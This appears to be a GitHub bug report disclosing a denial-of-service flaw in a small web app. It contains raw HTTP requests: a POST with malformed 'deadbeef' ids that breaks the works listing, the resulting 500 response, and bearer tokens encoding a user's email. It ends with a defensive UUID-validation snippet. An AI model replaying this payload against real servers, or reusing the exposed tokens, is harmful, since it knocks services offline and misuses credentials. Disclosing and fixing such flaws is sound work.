Service outage caused by POSTing invalid ids #125

Open
t3mp-0xCC opened this issue Nov 13, 2022 · 1 comment

@t3mp-0xCC

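When posting, sending a request that contains invalid ids like the one below causes the works listing to respond with 500 (Internal Server Error), and the works can no longer be viewed.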

POST /api/v1/works?post_discord=true HTTP/2
Host: kodomobeya.compositecomputer.club
Content-Length: 269
Sec-Ch-Ua: "Chromium";v="107", "Not=A?Brand";v="24"
Accept: application/json, text/plain, */*
Content-Type: application/json
Sec-Ch-Ua-Mobile: ?0
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJoYXlhYnVzYS5rYWl5b3VAZ21haWwuY29tIiwidG9rZW5fdHlwZSI6ImJlYXJlciIsImV4cCI6MTY2ODM1Mzg2MH0.42C18yeGywc0J4tvMArcCNcbdTIdtGrufztMkQr32dE
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36
Sec-Ch-Ua-Platform: "Linux"
Origin: https://toybox.compositecomputer.club
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://toybox.compositecomputer.club/
Accept-Encoding: gzip, deflate
Accept-Language: ja,en-US;q=0.9,en;q=0.8

{
    "title":"Dangerous Toy",
    "description":"I ganna down the toybox server",
    "visibility":"private",
    "thumbnail_asset_id":"deadbeef",
    "assets_id":["deadbeef"],
    "urls":[],
    "tags_id":["deadbeef"]
}

A normal request looks like this:

POST /api/v1/works?post_discord=true HTTP/2
Host: kodomobeya.compositecomputer.club
Content-Length: 269
Sec-Ch-Ua: "Chromium";v="107", "Not=A?Brand";v="24"
Accept: application/json, text/plain, */*
Content-Type: application/json
Sec-Ch-Ua-Mobile: ?0
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJoYXlhYnVzYS5rYWl5b3VAZ21haWwuY29tIiwidG9rZW5fdHlwZSI6ImJlYXJlciIsImV4cCI6MTY2ODM1Mzg2MH0.42C18yeGywc0J4tvMArcCNcbdTIdtGrufztMkQr32dE
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36
Sec-Ch-Ua-Platform: "Linux"
Origin: https://toybox.compositecomputer.club
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://toybox.compositecomputer.club/
Accept-Encoding: gzip, deflate
Accept-Language: ja,en-US;q=0.9,en;q=0.8

{
    "title":"Dangerous Toy",
    "description":"I ganna down the toybox server",
    "visibility":"private",
    "thumbnail_asset_id":"d3e8606e-f5a4-4a89-a4d4-64f5a043c63f",
    "assets_id":["f77c3ad2-0166-4e3b-bf23-26fdcd206222"],
    "urls":[],
    "tags_id":["e5b3e6b2-7c26-42a4-a163-c3803519e2e2"]
}

The request that gets the 500 and its response are below:

GET /api/v1/works HTTP/2
Host: kodomobeya.compositecomputer.club
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: application/json, text/plain, */*
Accept-Language: ja,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJoYXlhYnVzYS5rYWl5b3VAZ21haWwuY29tIiwidG9rZW5fdHlwZSI6ImJlYXJlciIsImV4cCI6MTY2ODM1NDE5NX0.nrPTmIjsVC0R-7QZ_jTToZOg_IqE3oWuMtuHI93ZdKU
Origin: https://toybox.compositecomputer.club
DNT: 1
Connection: keep-alive
Referer: https://toybox.compositecomputer.club/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Sec-GPC: 1
Pragma: no-cache
Cache-Control: no-cache
TE: trailers

HTTP/2 500 Internal Server Error
date: Sun, 13 Nov 2022 15:28:27 GMT
content-type: text/plain; charset=utf-8
content-length: 21
cf-cache-status: DYNAMIC
report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yx9lvE4ql27OUwn9%2FEHQbAPbLNc%2FJ77dRYLKkUuFZf7A2VQZj0A7SaXXD4zJ8mIb4QSCyKFIzPKbYjGRaXI7bcvc%2FvpUvqnMFiYrzQHMtIg3xWuP9lrMJrRvcB0sGZROvWLM5zStYh4WROwIvyqChYGcUhI%3D"}],"group":"cf-nel","max_age":604800}
nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
server: cloudflare
cf-ray: 7698898afb9580fc-NRT
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Firefox-Spdy: h2

@t3mp-0xCC
Author

I'll do the fix myself as well.

Simo-C3 added the bug and Vulnerabilities labels Nov 13, 2022
t3mp-0xCC self-assigned this Nov 13, 2022
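
One way to reject the malformed ids at the POST boundary, so they are never stored for the works listing to trip over. This is an added example, not the project's code: it assumes the id fields must be UUIDs, as in the normal request in the report, and the function names and error strings are hypothetical. It checks only the shape of the ids, not whether they refer to existing assets or tags.

```python
import json
import uuid

# Field names come from the request bodies in the issue. Assumptions: all
# three fields are required and every id must be a canonical UUID.
SINGLE_ID_FIELDS = ("thumbnail_asset_id",)
LIST_ID_FIELDS = ("assets_id", "tags_id")

# Bodies from the issue, reduced to the id fields.
BAD_BODY = '{"thumbnail_asset_id":"deadbeef","assets_id":["deadbeef"],"tags_id":["deadbeef"]}'
GOOD_BODY = ('{"thumbnail_asset_id":"d3e8606e-f5a4-4a89-a4d4-64f5a043c63f",'
             '"assets_id":["f77c3ad2-0166-4e3b-bf23-26fdcd206222"],'
             '"tags_id":["e5b3e6b2-7c26-42a4-a163-c3803519e2e2"]}')


def _is_canonical_uuid(value):
    """True only for strings in the hyphenated 8-4-4-4-12 hex form."""
    if not isinstance(value, str):
        return False
    try:
        # uuid.UUID also accepts braces and unhyphenated hex; the round
        # trip through str() rejects those spellings.
        return str(uuid.UUID(value)) == value.lower()
    except ValueError:
        return False


def validate_work_payload(raw_body):
    """Return (payload, errors); errors is empty when every id is well formed."""
    try:
        payload = json.loads(raw_body)
    except ValueError:
        return None, ["body is not valid JSON"]
    if not isinstance(payload, dict):
        return None, ["body must be a JSON object"]
    errors = []
    for field in SINGLE_ID_FIELDS:
        if not _is_canonical_uuid(payload.get(field)):
            errors.append(f"{field}: not a UUID")
    for field in LIST_ID_FIELDS:
        values = payload.get(field)
        if not isinstance(values, list):
            errors.append(f"{field}: expected a list of UUIDs")
            continue
        for index, value in enumerate(values):
            if not _is_canonical_uuid(value):
                errors.append(f"{field}[{index}]: not a UUID")
    return payload, errors
```

A handler would answer with a 4xx status and store nothing whenever the returned error list is non-empty.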